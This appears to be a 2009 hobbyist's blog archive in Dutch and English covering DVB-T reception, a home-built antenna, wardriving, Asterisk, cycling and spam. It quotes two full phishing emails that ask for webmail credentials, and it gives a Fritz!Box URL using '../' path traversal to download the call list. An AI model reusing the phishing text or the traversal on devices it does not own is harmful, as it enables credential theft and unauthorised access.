Ook leuk is om op te graven in de geschiedenis hoe hard Nederland 1, 2 en 3 ooit over ons uitgestrooid werden: het Nozema TV frequentieoverzicht uit 2002 geeft 100, 1000 en 1000 kiloWatt ERP (!). Dat gaat nu met 10 kiloWatt per DVB-T multiplex.

In the dvb-t scan yesterday evening late:

TV Gelderland :642000:I999B8C999D999M999T999G999Y999:T:27500:7041:7042:7043:0:1104:0:0:0
Radio Gelderland:642000:I999B8C999D999M999T999G999Y999:T:27500:0:7112:0:0:1111:0:0:0

Part of Digitenne bouquet multiplex 1 at 642 MHz. The transmitter could be Oss or Veenendaal given distance and transmitter power. I only noticed it yesterday but now I see it in the w_scan output a few times. The reception is not error-free (I had to wait a bit for a chance of a screenshot with not too much distortion).

No extra foreign channels from the dvb-t scans.. yet. I keep an eye on the tropospheric ducting forecast for northwest europe. I also updated the DVB experiments page with the DX results.

Bouquet or Multiplex? It is described as bouquet at DVB-T zenders Digitenne Nederland but the mpeg standard term for multiple program streams in one transport stream is 'multiplex'. Bouquet in DVB terms means a set of 'programs' logically grouped together.

Tijd om wat aan mijn ligfiets te doen: het stuur was verbogen geraakt, vermoedelijk als gevolg van een harde val. Het nadeel van aluminium: daar buig je weinig aan terug. Maarja, het is zoveel lichter. Ik heb op Cycle Vision een praatje gemaakt met de mensen van Nazca Ligfietsen en die konden heel snel een vervangende stuurbocht opsturen. Mijn vraag was natuurlijk hoe ik het stuur uit elkaar moest halen, vooral de (de)montage van de bar-end shifters was me niet duidelijk. Bij de Shimano techdocs site kon ik de gewenste documentatie en tekeningen vinden, en toen was het ineens allemaal wel duidelijk. Stuur gedemonteerd, alle tie-wraps er af, oude stuurbocht eruit, nieuwe stuurbocht er in en weer alles gemonteerd. Ik denk alleen dat ik voor de vakantie ook nog remkabels wil vervangen. Het is wel een lekker gevoel om je eigen fiets gerepareerd te hebben.

I redid a bit of pictures.idefix.net and made a few extra collections public that are public anyway. Now for the wish-list of pictures to take...

What you don't want to see in your data center: Photos: Inside the Fisher fire - Techflash. One interesting effect from that fire was: TV station forced to go old school after fire at Seattle's Fisher Plaza. Found via The Risks Digest.

Time for some website programming: Amazon was notifying me that Amazon 'Product Advertising API' requests (formerly known as Amazon Web Service) now need to be digitally signed. The 'why' of this is probably something with security. For the 'how' I had to revive those braincells which once programmed Amazon Web Service into The Virtual Bookcase. Those braincells took time as I was first browsing in the wrong sourcefiles. But, after having a peek at Jaap's free Amazon PHP Scripts and incorporating the change to sign requests into my sources, I found the right way again.

One of those times I am glad I have a development version of the site (smaller database, code in development), a qa version (production database, candidate code) and a running version (production database, production code) to test changes like this. The visitors of The Virtual Bookcase never saw all the tries in getting the code to work right.

It was a while since I did any serious work on that site. Otherwise it runs on autopilot and I only add new books and reviews from time to time. Ok, the income from the site has dropped in the same way.

Aankondiging vandaag in xs4all.general: Tour de France via IPv6. Streaming via IPv6, het kan... voor xs4all klanten. Goed om te zien dat omroep.nl weer actief is met innovatie. Net als een vorig experiment (Nederland 1 HD via multicast) wordt het pas aangekondigd als het evenement al een aardig stuk onderweg is, wat meer met rechten te maken heeft dan met de techniek.
Update : De stream met beeld is alleen beschikbaar tijdens de etappe overdag en tijdens de 'avondetappe'. De radio1 stream doet het de hele tijd, die heb ik dus al succesvol beluisterd vanaf thuis.

Wardriving results 22 June - 12 July : 829 new networks with GPS locations according to the WiGLE stats. The only special wardrive was a ride together with another wardriver to Enschede. I had the 802.11a scanning enabled, he had a different antenna type.

Some websearching suggests my headaches with mISDN could be solved by using the qozap driver which I get when I compile zaptel-sources. Just a bit of configuring asterisk differently... time to find some time for that somewhere.

Yesterday evening I installed a 6-tape DDS-3 changer in the homeserver greenblatt and activated the latest ubuntu kernel updates. The tape changer works great but the mISDN drivers got confused because the 'loading drivers' stage at boot loads them without the right parameters which results in confused drivers (hardware not found) which I can't unload because that causes a kernel panic. Workaround: remove the mISDN drivers, reboot the system, reinstall the mISDN drivers and let /etc/init.d/mISDN load the drivers in the correct way.

I caught the Omroep Brabant logo last night: after dark reception is a lot better! The Digitenne B1 bouquet at 546 MHz and Digitenne B2 at 786 Mhz scanned fine.

I took some pictures of the log-periodical antenna which improved the reception of dvb-t stations in the area and updated the DVB experiments page with them. A big thankyou to Alan Yates for doing the calculations for the UHF log-periodic antenna which has been built by several other hobbyists.

Het artikel Regering dreigt digitale (ether)televisiemarkt te verstikken van David de Jong geeft aardig weer wat er mis is met de televisiemarkt in Nederland. Ik heb er zelf mijn commentaar nog aan toegevoegd dat ik veel meer zie in mogelijkheden voor free-to-air lokale omroepen via dvb-t dan voor dvb-h (mobiel TV) wat eigenlijk voor een deel een kopie is van wat er al via dvb-t gedistribueerd wordt. Ja, Nederland is een land met heel veel buren die ook iets willen en heeft dus maar heel beperkte frequentieruimte. Maar dat alleen maar gebruiken voor mobiele telefonie is jammer.

Het is een regenachtige dag vandaag, maar de neerslagradar van het KNMI heeft momenteel geen data, en buienradar.nl is maar naar de backup-methode overgeschakeld, zo te zien duitse radar. Op de webcam zijn de buien te zien die voorbij trekken.

Afgelopen weekend zijn we op Cycle Vision 2009 geweest. Een evenement van de Nederlandse Vereniging voor Human Powered Vehicles. Ik ging daar vooral heen om te fotograferen. Een internationaal gezelschap van ligfietsers die in diverse evenementen competitie streden leek me wel kans te geven op mooie plaatjes. Na een selectie uit de overvloed die op de geheugenkaarten stond: Cycle Vision 2009 Tilburg.
Ik ben zelf erg tevreden over deze: handbike tijdens uursrace Cycle Vision 2009 Tilburg

Nice sample in the spam of what is in Dutch called acquisitiefraude (aquisition fraud?). Trying to make companies pay for being in some 'register' where nobody looks. From the spam e-mail:

In order to have your company inserted into the registry of World Company Directory for 2009/2010, please print, complete and return the enclosed form (PDF file) to the following address:

With the detail:

Updating is free of charge!

Well, updating may be free, insertion isn't when reading the small print in the PDF:

I HEREBY ORDER A SUBSCRIPTION WITH SERVICE PROVIDER WORLD BUSINESS DIRECTORY LTD. I WILL HAVE AN ENTRY INTO ITS DATABASE FOR THREE YEARS. THE PRICE PER YEAR IS EUR 980.

Spammers and frauds nicely working together, not a surprise.

"World Company Directory" melding bij steunpunt acquisitiefraude

The log-periodical antenna has effect: a number of signals show workable data in w_scan. New:

490 MHz - Digitenne B3 from probably Lelystad
514 MHz - Digitenne B1 from Lelystad, including TV Flevoland / Radio Flevoland
682 MHz - Digitenne B4 from Lelystad

And with aiming and trying (3 windows with dvbsnoop for pid 0x00, 0x10 and 0x11, one window with tzap reading the signal strength):

546 MHz - Digitenne B1 including Omroep Brabant, source unknown

Updated the DVB experiments page with the latest findings. Time to take pictures of the antenna I built.

So, who is this nobody user anyway? Porting account-management scripts from Centos linux to ubuntu made strange problems show. A short check found interesting differences. After asking around on irc and trying some things I found quite a choice:
Centos linux:

nobody:x:99:99:Nobody:/:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

Ubuntu linux:

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

FreeBSD 6.1:

nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin

Solaris:

nobody:x:60001:60001:Nobody:/:

Interesting is that creating a file as root on a solaris nfs client will create it as 65534:0. Data Ontap:

pw_name = nobody
pw_passwd = 
pw_uid = 65535, pw_gid = 65535

First success with the self-built antenna: I tried it in the 'home office', approximately 5 meters above ground, north-east direction. With the log-periodical antenna pointing outside through the window I was able to receive Digitenne bouquet 1 at 618 MHz UHF, which includes radio and TV Noord-Holland.

A spammer on the block named Facebook. And I'm not talking about spamming in facebook, I'm talking about spam from facebook in my mailbox, disguised as an 'invitation'. From the e-mail:

I set up a Facebook profile where I can post my pictures, videos and events and I want to add you as a friend so you can see it. First, you need to join Facebook! Once you join, you can also create your own profile.

PREMIER SITE DE RENCONTRE 100% GRATUIT. chat,envoie de mails,inscription,photos, envoie de vos coordonn�es personnel aux autres membres .......tous les services sont GRATUITS sur notre site de rencontre

Some French-language website (on facebook? redirecting somewhere else? I have to register with facebook to find out: no way). And, at the bottom:

******@ruu.nl was invited to join Facebook by Azza Ava. If you do not wish to receive this type of email from Facebook in the future, please click on the link below to unsubscribe.

That e-mail address points at a role-account here (and given the fact that the @ruu.nl version is used means a really old spammer list is used too). So it has never been subscribed to anything from Facebook. No need to unsubscribe, this is pure spam. According to whois for the sender-IP:

NetRange:   69.63.176.0 - 69.63.191.255 
CIDR:       69.63.176.0/20 
OriginAS:   AS32934
NetName:    TFBNET2
NetHandle:  NET-69-63-176-0-1
Parent:     NET-69-0-0-0-0
NetType:    Direct Assignment
NameServer: DNS04.SF2P.TFBNW.NET
NameServer: DNS05.SF2P.TFBNW.NET
Comment:    Contact abuse@facebook.com with issues.
RegDate:    2007-02-07
Updated:    2009-03-04

I am not fully convinced their abuse department is going to change their system not to annoy random e-mail accounts with invitation-spam. Time to notify uplink providers too that there is a spammer in the house.
Update: the nice autoreply from abuse at facebook tells me all about privacy on facebook and stuff like that. Bzzzzt, wrong answer! I'm from the non-facebook world and I don't want your invitations. I'll discuss this with your uplink providers. They have the wire-cutters to really deal with the problem.
Update^2: According to the facebook abuse department the mail was faked and not really from facebook. I disagree: the headers show an outgoing facebook mail server.

Ooit, lang geleden toen ik nog het blad Computer!Totaal onvermijdelijk kreeg bij het HCC lidmaatschap heb ik op het bijbehorende forum begin 2004 wat reacties gepost over artikelen. Vandaag kreeg ik om 13:03 ineens e-mail op het adres van de forum registratie over het Grote Merkenonderzoek van ComputerTotaal.
Daar was die forumregistratie niet voor, dus ik volg gelijk de link om geen e-mail meer te ontvangen, een typische link met cryptografische hash. Op de site (waar het goeie e-mail adres staat, dus de link was inderdaad gepersonaliseerd) blijken 4 categorieën te zijn waarin je e-mail kunt krijgen waarvan 2 aangevinkt. Ik wilde niets meer te maken hebben met Computer!Totaal of IDG dus heb ik ze gelijk uitgevinkt. Dan krijg je een nieuwe link in je e-mail om die wijzigingen te bevestigen.. waarom? Zijn ze bang dat iemand anders de link misbruikt om hun e-mail te stoppen? Een beetje overkill na die eerdere link met cryptografische hash. Die bevestiging natuurlijk gedaan om 13:24.
Vervolgens krijg ik om 16:01 weer mail, dit keer voor het 'Tips & Trucs forum' wat graag een nieuwsbrief kwijt wil. De link om mijn 'voorkeuren voor het onvangen van e-mail van Tips & Trucs te wijzigen' levert op dat daar weer 4 categorieën zijn waarvan 2 aangevinkt. Dus nog meer spam e-mail uit die hoek.
Dan vraag ik het niet meer lief, blijkbaar zijn Computer!Totaal / IDG uitgevers / Tips & Trucs gewoon spammers. Ok, daar kan ik gewoon een klacht over indienen, dat is ook een stuk minder werk.

Wardriving results 13 June - 21 June: 2004 new networks with GPS locations.

Several times when I scanned for DVB-T signals in the UHF band from home I saw some very weak signals on several frequencies. Too weak to make out anything other than that the signals are very probably DVB-T as the radio scanner does not pick up a thing there (for as far as I know FM receivers cannot pick up QAM signals). The DVB-T receiver I use has a small external antenna (simple half-wavelength wire), so to get more signals I will have to use a good antenna. Buying something is expensive and it is to me much more interesting to build something myself from scrap materials. Most promising seems to be Alan Yates' Laboratory - UHF Log-Periodic Array so I'm browsing my scrap electronics for materials to build this.

The empty slot I found before in a dvb service scan where BemBem used to be is now:

0x0000 0x0072: pmt_pid 0x0474 Digitenne -- 100%NL (running, scrambled)

As reported by radio-tv-nederland.nl.

Just heard on the scanner on one of the air traffic channels: "Request for sightseeing the Amsterdam Schiphol sector" describing (I think) the plane as a Cessna. It must be Sunday :)

The lightning detector had another active night.. and this time I slept right through it. Nothing like the high numbers on 26 May 2009 but still a peak.

So, the US is now also switched over to digital television. I found a nice compilation of analog shutdowns on youtube: 2009 DTV Transition: Analog TV Shutoffs in Los Angeles As They Happened and one particular WABCEndsAnalogShrtVrs061209 from ABC channel 7 New York. Some stations made a nice item out of it with a countdown and some just dropped their analog signal in the middle of a program. One big thing in the US is a lot of TV channels use their channel number in their branding (like ABC 7 for WABC above) and the US brother of DVB-T named ATSC has provisions for channels 'named' with a number which is not equal to the VHF/UHF frequency.
Update: Journal entry describing the end of analog tv broadcast: uneventful

Vandaag in het nieuws: Privacy ondergeschikt in paspoortwet - De Volkskrant : er is een nieuwe paspoortwet geaccepteerd door zowel de tweede als eerste kamer die enorme gevolgen heeft voor de privacy zonder dat het Malieveld heeft volgestaan met demonstranten. Terwijl de inhoud van dit wetsvoorstel volgens mij wel alle aanleiding geeft tot demonstraties aan de ene kant en serieuze vragen waarom de Nederlandse wetgever zich niet aan de Nederlandse grondwet wil houden aan de andere kant. Helaas hebben we in Nederland (nog) geen constitutioneel hof wat de wetgever op de vingers kan slaan. Uit het artikel

Alle Nederlanders boven de 14 jaar komen met hun vingerafdrukken, foto, sofi- of BSN-nummer in één databestand. Een bestand dat vrij toegankelijk is voor de inlichtingendienst en onder voorwaarden kan worden ingezien door justitie en politie.

Onder voorwaarden is natuurlijk waar het eerste aan getrokken gaat worden. Binnen de kortste keren zit elke rechercheur er ongestoord in te grasduinen.

Juist op de 80e geboortedag van Anne Frank moet iedereen zich toch realiseren wat een enorme gevaren voor de vrijheid van iedere Nederlander uitgaan van een dergelijk databestand. De enige manier om zo'n bestand te beschermen tegen misbruik is het niet aan te willen leggen.

De vraag is: als het gaat om veiligheid in Nederland, wie beschermt ons tegen de overheid?

Wardriving results 2 June - 12 June: 1509 new networks with GPS locations. I am now at position 14 in the WiGLE stats with currently 163418 new networks with GPS locations found.

Wat perl code om met Chipcard::PCSC het saldo en de laatste 5 transacties van een chipknip uit te lezen. Altijd handig als je toevallig een laptop met chipcard slot hebt. Het leuke is dat je ook kan zien wat het eigen nummer was van de chipautomaat waar je de transactie deed (SAM_ID) en het volgnummer (SAM_STAN) waarmee je kan zien waar je chipknip geweest is en kan zien hoeveel transacties automaten te verwerken krijgen. Perl code om een chipknip saldo te lezen en de laatste transacties.

Update 2012-04-10: Nee, ik heb helaas de originele java code niet meer waar ik veldgroottes en veldnamen aan ontleend heb. Slecht van me, ik had daar naar moeten verwijzen.

Why go through all the trouble of installing a hardware skimming device when the ATM runs Microsoft Windows XP? Cybercriminals refine data-sniffing software for ATM fraud - Network World. This is scary stuff. This means an ATM which fully looks like the real thing and has no glued-on extensions can still be compromised.

A wonderful image of how the times are changing: the Hollywood Sign is still basically the same as in 1923 (it has been 'Hollywoodland' until 1949). But the drum antennas in the back are a sign of the new times were digital communications change the media landscape and threaten the old business models that Hollywood hangs on to.
Image from Hollywood Sign Wikimedia Commons. Found via Study: P2P customers are Hollywood's best friends—really! - Ars Technica

Computers are better at... doing what you program to, not what you want. There is still an older computer running which once hosted my mailman mailinglists for several domains. I shut down mailman on that machine and migrated the lists. But mailman was never removed from the startup files and the machine rebooted today, resulting in three years of mailman monthly reminders mailed at once. So if you were looking why you got old mailman reminders from virtualbookcase, this is why.

The Hurricane Electric IPv6 tunnelbroker is now also part of the Google over IPv6 project. Clients can access google services over IPv6:

koos@apollo:~$ host www.google.com 2001:470:20::2
Using domain server:
Name: 2001:470:20::2
Address: 2001:470:20::2#53
Aliases: 

www.google.com is an alias for www.l.google.com.
www.l.google.com has address 74.125.39.105
www.l.google.com has address 74.125.39.104
www.l.google.com has address 74.125.39.147
www.l.google.com has address 74.125.39.103
www.l.google.com has address 74.125.39.99
www.l.google.com has address 74.125.39.106
www.l.google.com has IPv6 address 2001:4860:a003::68

Go Hurricane Electric!

Wardriving results 19 May - 1 June: 4284 new networks with GPS locations. I got up to position 14 in the WiGLE stats. I've taken the wardriving box on a few detours on the home - work route and it went along on a few nice recumbent bicycle rides we did around the city.

Met de correcte frequenties voor de eerste en tweede kiestoon heb ik nu een Asterisk simulator Nederlandse telefooncentrale (voor 1995) geschreven. Dat heeft me wat over de beperkingen van Asterisk en vooral de functie WaitExten geleerd. Maar hij doet het!

After finding out the hopefully correct frequency for the old Dutch first and second dialtone in the Netherlands I tried to implement a simulator for making calls in the style of an old Dutch phone exchange (although I can't simulate the clicks and background noises.. yet). This made some downsides of the Asterisk extensions.conf 'programming' language show. But, after some grumbling and testing and testing I think I found the right way.

Goed idee: HackdeOverheid. Ik heb in ieder geval wel wat ideetjes over hoe de gemeente Utrecht meer gegevens beschikbaar kan stellen en hoe burgers daar creatieve dingen mee kunnen.

De tweede kiestoon is gevonden! Dankzij het museum voor communicatie en een vrijwilliger daar.

De eerste kiestoon bestond vroeger uit een combinatie van 150 Hz en 450 Hz.
De 2e kiestoon was 450 Hz bij electromechanische systemen en 425 Hz bij computerbestuurde centrales.
Bij het vervallen van de tweede kiestoon op 10-10-1995 bestonden geen electromechanische centrales meer en is de frequentie van de tweede kiestoon gebruikt voor de kiestoon.

Dus als ik dat wil nabouwen in Asterisk krijg ik iets in indications.conf als:

[nl-old]
description = Netherlands before 10-10-1995
ringcadence = 1000,4000
dial = 150+450
; second dial tone after area code
seconddial = 450
busy = 450/500,0/500
ring = 450/1000,0/4000
congestion = 450/250,0/250
info = 950/330,1400/330,1800/330,0/1000
stutter = 450/500,0/50

en moet ik Playtones(seconddial) gebruiken.
Update : En nu heb ik 2 andere meningen dat de eerste kiestoon alleen 150 Hz was.

Vandaag weer phishing mail in krom Nederlands, maar met het beter lopende Engelstalige origineel er vlak achter. Dat maakt vergelijken leuk:

Subject: UNIVERSITAIR UTRECHT WEBMAIL: Werk Uw E-mai lRekening bij

De beste E-mail Gebruiker,

 om uw proces van de Controle van de Rekening te voltooien, u moet
antwoorden en dit bericht uw Gebruikersbenaming en Wachtwoord
respectievelijk in de ruimte ingaan die onder deze e-mail wordt
verstrekt. U moet dit vóór volgende 48hrs van ontvangstbewijs van deze
e-mail doen, of uw postRekening zal van ons Gegevensbestand worden
gedesactiveerd en worden gewist. Uw rekening kan ook worden
geverifieërd bij:

gaat Gebruikersbenaming in (         )
Ga Wachtwoord in (         )

Dank u voor het gebruiken van UNIVERSITAIR UTRECHT WEBMAIL

versus

Subject: UNIVERSITY UTRECHT WEBMAIL : Update Your Email Account

Dear E-mail User,

To complete your Account Verification process, you are to reply  this
message and enter your Username and Password respectively in the space
provided below this email.You are required to do this before the next
48hrs of  receipt of this e-mail, or your mail Account will be
de-activated and erased from our Database. Your account can also be
verified at:

Enter Username (         )
Enter Password (         )

Thank you for using  UNIVERSITY UTRECHT WEBMAIL

Iemand enig idee welke automatische vertaler dit gedaan kan hebben?

In het kader van het Collectors*Net spelen met oude telefoons vroeg ik me af: wat was de toonhoogte van de oude 2e kiestoon in Nederland (die je ooit kreeg na het draaien van het netnummer). Weet iemand nog wat de frequentie was van die 2e kiestoon? Het wikipedia artikel over telefoontonen geeft wel een plaatje van een toon maar aangezien de gewone kiestoon daar weergegeven wordt als een 440 Hz (A) terwijl het 425 Hz is denk ik niet dat de frequentie van die E correct is.
Update 2009-05-29: Gevonden! De correcte eerste en tweede kiestoon

In the category spammers will try anything that looks like an e-mail address I repeatedly find variations on this message in the system logs:

greenblatt sm-mta[12385]: n4RAsgSa012385: <8006@idefix.net>... No such user in domain

Where they get that idea? Simply: On the Asterisk podcast per telefoon page is a sip url for sip:8006@idefix.net. It looks like an e-mail address: spam it!

When I bought some 1-wire sensors a while ago at Hobby boards I included the lightning detector in the order. I installed it indoors in the attic where it also counts the switch of the fluorescent lights, so it will probably work better in an outdoor weather station further away from interference. But, in the early hours of today there was a heavy thunderstorm over this country and it counted like crazy. The stated sensitivity is about 80 kilometers:

this lightning detector will be able to pick up lightning more than 50 miles away

With the 75000 lightning strikes reported in the Netherlands for that night, the numbers don't look that strange.

Remember way back windows 95 / 98 reporting "Windows was shutdown incorrectly" after you had to reset it for the Nth time because it crashed or hung?

I was reminded of this today when I wanted to remove a USB disk from a server so I tried to use the "Safely remove hardware" tool which did nothing. When I gave up and just unplugged the disk the warning window jumped up telling me to use the 'Safely remove hardware' tool to do that.

Annoying.

Ik zag van het weekend dat er weer een duif zit te broeden in de conifeer voor het raam van onze werkkamer. Het leek me wel leuk om tijdelijk een uitbreiding te maken voor mijn webcam site zodat iedereen het nest kan volgen zoals Vogelbescherming Nederland ook doet met hun Beleef de lente project. Helaas, geen werkende extra webcam beschikbaar. De extra webcam op het werk geeft rare usb errors en weigert.

Ik wilde zelf een trackback maken binnen de blog van de hcc!pc netwerkgroep maar ondanks de e-mail over de trackback of de bevestiging van een reactie kwam er niks in de reacties (tabel serendipity_comments). Nergens een foutmelding te vinden. Ik had zoiets van 'vroeger werkte het wel vanaf idefix'.. en bedacht me dat het misschien een probleem was met trackbacks en comments vanaf IPv6 adressen. Een kleine websearch later leverde bevestiging op: s9y: IPv6 (Bugs) • Serendipity. Met een simpel psql statement:

ALTER TABLE serendipity_comments ALTER COLUMN ip type varchar(64);

Is het probleem uit de wereld en kan ik ook vanaf ipv6 clients comments achterlaten en trackbacks maken.

De zoveelste phishing mail vandaag, maar een van de vragen die de phisher stelt aan de gebruiker viel me op als een bijzondere vorm van krom Nederlands, vermoedelijk afkomstig uit een automatische vertaler. Ik raak bijna benieuwd naar de originele bewoordingen hiervan:

Duur van de e-mail wanneer er sprake is zeker:

Maar of alle phishers gebruiken dezelfde originele teksten en vertaler, of ergens is een website waar adviezen en standaard-teksten aan phishers verkocht worden en staat deze tekst als geschikt voor Nederlandstalig.

Wardriving results 11-18 May: 338 new networks with GPS locations. No spectacular results, just almost daily wardriving on the bicycle commute.

A while ago Twitter was so broken for me it showed a plain error message, not even a fail whale:

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Temporarily Unavailable error was encountered while trying to use an ErrorDocument to handle the request.

Double fail!

Issue at work today: our mailserver was a bit overloaded. We run spamassassin in daemon mode to filter incoming mail that made it past the simple smtp checks. I noticed that mail to all staff members caused lots of waiting spamc processes from time to time which made mail pile up. A lot of the spamc processes were killed after a while because maildrop limits the time mail delivery can take. The big fix will be to increase the memory on the mail server, it is now swapping a lot. But the small fix was to tune spamd to not try to kill all its child processes when idle. Starting and stopping spamd child processes is an 'expensive' operation and mails to all staff members trigger a lot of simultaneous spamc calls, so it works better if a mail to a lot of local users finds already running spamd servers. I changed the setting to --max-spare=5 which made the load problem go away. We will still get a memory upgrade, but this simple processing fix also helped.

Wardriving results 26 April - 10 May: 4605 new networks with GPS locations at WiGLE. A few bicycle rides were planned around parts of Utrecht including a visit to previously uncharted parts of De Meern.

De supermarkt op de Uithof heeft 'mtn dew' wat de nieuwe naam blijkt te zijn voor 'Mountain Dew' wat ik wel eens in de verenigde staten of canada heb gedronken. Het blijkt de amerikaanse versie te zijn geimporteerd en gestickerd door American Food Service. Zo amerikaans dat ze bij de kassa van de supermarkt niet eens de scanner gebruiken maar gelijk een code intikken.

A first (for me): phishing mail (still from ADMIN at helpdesk.org) which has a web-link to 're-validate your mailbox' which points to a form at emailmeform.com. By the description of the service they will mail it to the form owner, but that owner can be a dropbox like for any phishing mail, just a bit harder to trace. The form asks for username, password and e-mail address.
Update: the phishers will have to do better, emailmeform has blocked the form and the account fast.

I run an irc server for a very small irc network, and in the past I tried to ipv6-enable it, but failed and let it at that mainly because that was in the hurry of trying to migrate services. Today, with all the ipv6 news from the ripe conference in mind I gave it a go again.

I use ircd-hybrid 7.2.2 (ubuntu package) which should support ipv6. But I never configured the IP to listen on, which makes it default to 0.0.0.0, v4-only. The fix was to define two IP addresses and ports:

listen {
	host = "1.2.3.4";
	port = 6667;
	host = "fe80::525f:c4ca";
	port = 6667;
}

Now the irc server is both ipv4 and ipv6 reachable, and updated in the dns. My client irssi needed an option /set resolve_prefer_ipv6 ON to actually use it, but now I have it working. One more service converted!

It seems the painters of the building were either very sloppy or aspiring vandals, they painted over the window right in front of my webcam on 7 April 2009. So I moved the webcam a bit.

The new scanner has been found: a Commtel COM225 scanner, which has a range from 25 MHz to 1300 Mhz and good scanning and receiving capabilities. A nice secondhand one, found via Marktplaats. Now I am programming lots of frequencies including Schiphol airport frequencies and other airport and eurocontrol frequencies. Commtel COM225 review at strongsignals.net.

An end to the continuing tale of the windows domain controller behind a firewall which I mentioned twice before. Finally I can log in with a reasonable speed. Kerberos over UDP (88/udp) was failing and I could not find out why because test traffic to port 88/udp made it. Peering long and hard at the wireshark dump I saw UDP fragmentation happening, but those fragments did not show up at the server. Another google search found How to force Kerberos to use TCP instead of UDP in Windows with the right registry key to force the client to use TCP, which fixed it. Finally.

I have been looking for a better radio scanner recently. For the amount of use it will get and what I want a second hand one is probably best. I also noticed the new ones on sale at the moment in the Netherlands are quite limited.
There are the simple ones with 50-100 channels which don't have the militairy air communications band that I want, and no 'tuning' option (tuning up and down the dial when looking for signals in a certain area).
Those are sometimes sold as 'church radio' in the Netherlands because somewhere in the years the rescue services moved to encrypted speech (C2000), frequencies 148.0125 to 149.0875 MHz and 153.0125 to 153.6875 MHz were opened especially for 'church radio': transmitting a church service (and nothing else). Most scanners will support this range. I really don't think the 'target audience' of church radio, people who want to hear a church service but are unable to go to church, usually elderly or sick people will be able to deal with all the little knobs and dials on the average radio scanner. I looked at the designs for church radio via Internet 'receivers' and those have a volume control and an on-off switch. The very advanced model has a 'channel' selector for choosing a church or gospel music.
The higher-end radio scanners sold new are really high-end with alphanumeric channel descriptions and trunk-tracking options. A bit too much for what I want, and too expensive.
So I'm browsing the secondhand scanner ads on a few websites. And everytime I see an offer that looks nice I look up the details of the offered scanner on the scanner reviews on the Strong Signals site which is a very good resource for finding out the options of scanners and comparing them.
I hope to find one for a reasonable price. In browsing the ads I learned about brands I haven't heard of before. There is Commtel which is actually from Uniden and GRE, making some Commtel models near copies of Uniden Bearcat models. There is also Realistic which seems to be the other name for Radio Shack scanners. Icom also makes receiver / scanners but those are out of my price range.

Wardriving results 7 - 25 April: 5152 new networks with GPS locations. The tour in another part of the country (near Arnhem) helped for almost half of that.

Interesting article The Great Brazilian Sat-Hack Crackdown in Wired on-line today. UHF-Satcom.com audio samples has some interesting samples of pirates using these frequencies and other interesting stuff (such as space shuttle audio). Time to dig up my radio scanner and see what I can find on these frequencies as listed at UHF Satellite reception - UHF-Satcom.
Update nothing, as this is outside the range of my trusty old Uniden Bearcat UBC120XLT, ranges 66-88, 108-174 and 406-512 MHz. Maybe time to find something better.

Good opinion article by The Register on the stance of UK police on cameras pointing their way: Police, Cameras, Inaction! - The Register with a great conclusion:

If the issue is not addressed soon – as the systemic problem we suspect it is - then the Police will only have themselves to blame for a massive loss of public belief in their integrity.

A good article with a readable view on what is going wrong with the police in England.

I did it: we now use Asterisk as home 'pbx'. I bought an OpenVox dual ISDN card via Novavox. Great company, Novavox: when it would take about a week to deliver the card they got in touch to make sure I could wait that long.

The choice for dual ISDN was because I still want to keep the outside line via KPN isdn: we are also using budgetphone but it was quite easy to find a phone number that was unreachable via budgetphone but reachable via KPN. And I want to keep using an ISDN set. So one port of the isdn card is configured as 'TE' card (terminal equipment) connected to KPN and one is configured as 'NT' card (network terminator) connected to the ISDN set. Asterisk does all the heavy lifting: outgoing call routing depending on number called and time of day. Incoming call routing, reacting to callerid and advanced answering machine.

Just in CNN (US edition) breaking news e-mail:

-- Ashton Kutcher is first to reach 1 million followers in Twitter contest with CNN.

I guess Twitter is now mainstream enough to generate its own breaking news. Ashton Kutcher first to reach 1 million in Twitter battle with CNN - CNN Technology which explains it: CNN news is big news for CNN.

Spring in the garden: the birds are quite busy and eat lots of seeds. My guess is they are more hungry now (time to build their nests) than in winter time. Everything is green and coming alive. Yesterday evening I could sit outside for a while.

Pasen: tijd voor het paastreffen van de nederlandse vereniging voor human powered vehicles, in het dagelijks gebruik beter bekend als de ligfietsers. Dit jaar ook weer op camping de Harskamperdennen in Harskamp.

Vrijdag er heen met een groepje uit Utrecht van de u-liggers, een leuke rit bij aangenaam weer.

Zaterdag ben ik zelf er op uit gegaan om mijn wardrive score bij te stellen door vanaf een andere plek dan gewoon te gaan fietsen. Het werd een fietstocht Harskamp, Otterlo, een stukje Arnhem, Wolfheeze en een puntje van Ede en weer terug. Nieuwe netwerken gevonden: 2640 (op 3021 totaal, bijzonder hoge verhouding voor wardriven). Net voor Ede brak de binnenkabel van de achterderailleur van mijn fiets, dus toen was de focus op terugkomen. Doordat de derailleur terugschoot zat ik achter in de hoogste versnelling en moest ik mijn kleinste voorblad kiezen om nog een beetje weg te kunnen rijden. Bij de fietsenmaker in Harskamp gestopt, die had nieuwe binnenkabels voor Shimano. Op de camping de nieuwe kabel er in gezet en toen bleek ook dat de buitenkabel aan het verslijten is. We kregen de binnenkabel er niet door. We, want als je in dit gezelschap aan je fiets gaat sleutelen heb je binnen de kortste keren hulp met goeie inzichten. Uiteindelijk zat het probleem in de laatste centimeters buitenkabel en die hebben we afgeknipt. Het geheel past nogsteeds en ik schakel nu weer stukken lichter. Maar die buitenkabel mag dus ook wel eens vervangen worden. Met mijn rijstijl slijt er toch van alles aan zo'n fiets.

Het programma voor Zondag was niet de traditionele toertocht maar een puzzeltocht in groepjes. Iedereen in een groep laten fietsen was bij het aantal inschrijvingen verkeerstechnisch niet meer handig. Maarten had een hele leuke puzzeltocht samengesteld die we met een groepje van 10 personen prima uit konden voeren. Ik had de accu van de wardrive box aan de lader gehad dus die ging voor de aardigheid ook weer mee. Heel wat vragen van mede-ligfietsers mogen beantwoorden over wat die antenne was achterop de fiets. Voor degenen die het nog nalezen: 629 nieuwe netwerken gevonden, 837 in totaal, en dat voor een rit grotendeels door open velden. Een kaartje met de route en de gevonden netwerken.

Maandag weer opruimen en afbreken en terug naar huis. Ook prima fietsweer, niet te warm.

I was looking for scriptable ways to download the call records from a fritz!box. It took some hacking, but I found it, just go to http://fritz.box/cgi-bin/webcm?getpage=../html/de/FRITZ!Box_Anrufliste.csv for the list in a usable .csv format. Works for the 5012 and 7170.

Again the UK police show their worth by being more involved in the cause of the death of Ian Tomlinson than first reported: Video reveals G20 police assault on man who died - guardian.co.uk

